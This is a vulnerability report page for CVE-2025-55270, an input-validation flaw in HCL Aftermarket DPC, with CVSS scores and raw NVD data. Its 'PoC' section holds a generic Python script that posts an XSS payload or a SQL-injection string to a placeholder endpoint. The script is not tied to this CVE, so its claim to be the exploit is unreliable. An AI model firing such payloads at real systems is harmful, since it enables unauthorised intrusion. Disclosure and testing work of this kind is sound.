Security Vulnerability Report
CVE-2025-55270 CVSS 3.5 LOW

CVE-2025-55270

Published: 2026-03-26 13:16:26
Last Modified: 2026-03-26 20:32:53

Description

HCL Aftermarket DPC is affected by Improper Input Validation, which allows an attacker to inject executable code and carry out attacks such as XSS, SQL Injection, Command Injection, etc.

CVSS Details

CVSS Score: 3.5
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
Version information is not explicitly specified in the provided text.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (replace with the actual vulnerable endpoint)
target_url = "http://target-ip/vulnerable_endpoint"

# Malicious payload demonstrating potential injection
# Example: SQL Injection test or XSS payload
payload = "<script>alert('XSS')</script>"  # or "' OR '1'='1"

# Send POST request with the payload
params = {"user_input": payload}

try:
    # A timeout keeps the check from hanging on an unresponsive host
    response = requests.post(target_url, data=params, timeout=10)
    print(f"Status Code: {response.status_code}")
    # A payload echoed back unencoded indicates missing output encoding
    if payload in response.text:
        print("[+] Potential Vulnerability Detected: Payload reflected in response.")
    else:
        print("[-] Payload not reflected. Further analysis required.")
except requests.RequestException as e:
    print(f"Error: {e}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55270", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:26.413", "lastModified": "2026-03-26T20:32:52.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Improper Input Validation which allows an attacker to inject executable code and can carry out attacks such as XSS, SQL Injection, Command Injection etc."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por una Validación de Entrada Inadecuada, lo que permite a un atacante inyectar código ejecutable y puede llevar a cabo ataques como XSS, Inyección SQL, Inyección de Comandos, etc."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], 
"references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}